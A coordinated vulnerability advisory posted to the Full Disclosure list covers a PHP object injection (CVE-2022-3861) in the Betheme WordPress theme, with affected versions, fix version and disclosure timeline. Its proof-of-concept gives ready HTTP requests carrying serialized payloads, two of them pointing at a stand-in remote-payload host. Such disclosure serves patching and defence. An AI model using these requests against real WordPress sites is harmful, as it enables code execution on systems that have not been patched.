'[FD] [CVE-2022-3861] Betheme <= 26.5.1.4 - Authenticated (Contributor+) PHP Object Injection'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] [CVE-2022-3861] Betheme <= 26.5.1.4 - Authenticated (Contributor+) PHP Object Injection
From:       "Julien Ahrens (RCE Security)" <info () rcesecurity ! com>
Date:       2022-11-18 8:40:00
Message-ID: 1401F8ED-781E-4D01-B830-F8AC58D205CF () rcesecurity ! com
[Download RAW message or body]

RCE Security Advisory
https://www.rcesecurity.com

1. ADVISORY INFORMATION
=======================
Product:        Betheme
Vendor URL:     https://muffingroup.com/betheme/
Type:           Deserialization of Untrusted Data [CWE-502]
Date found:     2022-11-02
Date published: 2022-11-18
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVE:            CVE-2022-3861

2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.

3. VERSIONS AFFECTED
====================
BeTheme 26.5.1.4 and below

4. INTRODUCTION
===============
Ever since Betheme was just an idea, we knew that it would be different from all
other multipurpose WordPress themes we'd tried before.

We wanted to build something more than just another WordPress theme, that could
easily adapt to any project you need to work on without writing any code. A theme
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)

5. VULNERABILITY DETAILS
========================
The WordPress theme is vulnerable to multiple PHP Object injections when processing
input to multiple, privileged Wordpress ajax routes:

-mfn_builder_import -> "mfn-items-import" parameter
-mfn_builder_import_page -> "mfn-items-import-page" parameter
-importdata -> "import" parameter
-importsinglepage -> "import" parameter
-importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at
least Wordpress "Contributer" rights.

Successful exploits can allow the attacker to execute arbitrary code.

6. PROOF OF CONCEPT
===================
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 75
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 83
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

7. SOLUTION
===========
Update to version 26.6

8. REPORT TIMELINE
==================
2022-11-01: Discovery of the vulnerability
2022-11-03: CVE requested from Wordfence (CNA)
2022-11-04: Wordfence assigns CVE-2022-3861
2022-11-08: Vendor notification
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't \
                respond
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this \
                vulnerability
2022-11-18: Public disclosure

9. REFERENCES
=============
https://github.com/MrTuxracer/advisories

["signature.asc" (signature.asc)]

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEWVym3nC1+ioyX1+TzjvwrNEH1JsFAmN3RNUACgkQzjvwrNEH
1JtmdA/+NcvB6fSu6Ge7uu+qPnxnCnYZFod8ApSVK1SgCx/GaTWePrp7Dm0Db7EY
fuE/jLlAdeqbZQAbx+32oUh+8OvQH6Ov6j+FOUpZcXBCge3Jcw1BFxf8moppjOpI
K3w38g1zadVi1lafYdaonTKmjB/d01CRRLnAoU+525t5ME9kpGiSMVpFPkCIMsVv
Vt6Y81MRZdh8I+tTDzvUrmBQK8l/b/JpLZuKUwCaSCMlgvKc9nqBqBB1G6TFy2w1
Qp0nkW7MEXmTo0T391riVHNoQc3Bu2VUKsbW54/2qCzNa39eDA5Q5XtnySYeRcXL
vj+6Sx/NN5W8KqCMGExdIW1hzV42VRgHVNVn+8zNYU3de9n+2n5cGA6Rf0RaHudL
m1RhQywfGZ4sWK6NDw2Afj24J4iQAjeNkHB4wNRYjpFyh25ZNokirFNTrbccHRfQ
JoEfjDtTNJ6lH2BRyGdY1OwPDkaYOHUHg+8MzW4e6722bs7RxrrenzVjcPAfS63a
+4dh9+hUto3cYq/N5jmsXqgq2ZqQl55TFJB2tR2S6EAUJVyfdGxldNvxuQ3DKei1
GTcXmertR7jp0eLir4yl/IG58BmJEWJAfGaQPrA5O4H7h7cJho6dkzro7ni6ICjd
W/bEGilWsQflM7wU0/fsAROBKVJ0gJx7l3cQoBggbiuc2oceYNg=
=Jfev
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============1331793093886555905==--

[prev in list] [next in list] [prev in thread] [next in thread] 